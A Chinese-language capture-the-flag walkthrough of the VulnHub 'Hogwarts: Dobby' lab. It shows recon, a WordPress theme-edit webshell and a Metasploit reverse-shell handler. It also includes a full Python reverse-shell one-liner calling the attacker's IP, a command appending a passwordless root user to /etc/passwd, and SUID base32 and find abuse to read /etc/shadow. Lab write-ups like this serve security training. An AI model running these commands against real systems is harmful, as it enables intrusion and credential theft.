- 地址:https://www.vulnhub.com/entry/hogwarts-dobby,597/
- 难度:容易
信息收集
通过Mac地址找出IP
端口扫描
发现只开了个80端口↓
通过浏览器访问↓
发现是个apache的默认页面
接下来照例查看源代码↓
在末尾发现了提示
去访问下这个页面↓
是一个密码提示
目录扫描
---- Scanning URL: http://10.9.11.225/ ----
+ http://10.9.11.225/index.html (CODE:200|SIZE:10977)
+ http://10.9.11.225/log (CODE:200|SIZE:45)
+ http://10.9.11.225/phpinfo.php (CODE:200|SIZE:83279)
+ http://10.9.11.225/server-status (CODE:403|SIZE:276)
依次访问
pass:OjppbGlrZXNvY2tz
hint --> /DiagonAlley
有收获,在log目录下发现了个新的页面
WordPress的网站↓
wpscan扫描
sudo wpscan --update
sudo wpscan -url http://10.9.11.225/DiagonAlley/ -o wpscan.dobby
- 整理一下
apache 2.4.46 (ubuntu)
WordPress version 5.5.3
WordPress默认页面:
wp-cron.php
wp-login.php
http://10.9.11.225/DiagonAlley/wp-content/uploads/
WordPress默认登录页面↓
draco是一个用户,之前收集的信息中说 他的密码是他的house
没看过哈利波特,百度一下
试了一下发现,slytherin
是draco
的密码
登入后台↓
getshell
编辑主题拿shell↓
试试插入php代码↓
可以执行↓
可是蚁剑连接是乱码,无法解决
上美少妇
msfvenom 生成payload↓
- 写入payload
- msf监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.9.11.66
run
- 访问写入payload的页面反弹shell
拿flag
python获取交互式shell
查找有suid的文件
其中有个find
用find将root目录权限设置为777
获取flag
虽然可以拿到flag,但是没有提权到root
记录一下find提权过程
touch 1.txt
find 1.txt -exec "whoami" \;
虽然执行whoami是root,但是反弹shell却还是www-data用户
find权限也没问题
尝试用python命令反弹shell,结果也是www-data用户
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.9.11.66',44445));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
尝试写入一个用户到/etc/passwd文件中
echo "qjb::0:0:::/bin/bash" >> /etc/passwd
提权
猜测之前提权不成功是因为www-data用户权限太低,我们尝试dobby用户↓
因为之前我们看到有suid属性的文件中,有一个 usr/bin/base32
我们用这个命令读取shadow文件↓
将dobby用户的密文密码放到一个文件中,用 john破解 字典用 /usr/share/wordlist/rockyou.txt ↓
我也不知道用了多长时间,反正我放了一晚上,第二天来出来了
做到这里,我不禁想到,之前的用户用这条命令是不是也可以用这条命令提权至root用户?
竟然可以~ 我醉了,怀疑人生了!!!
不过总算是提权到root了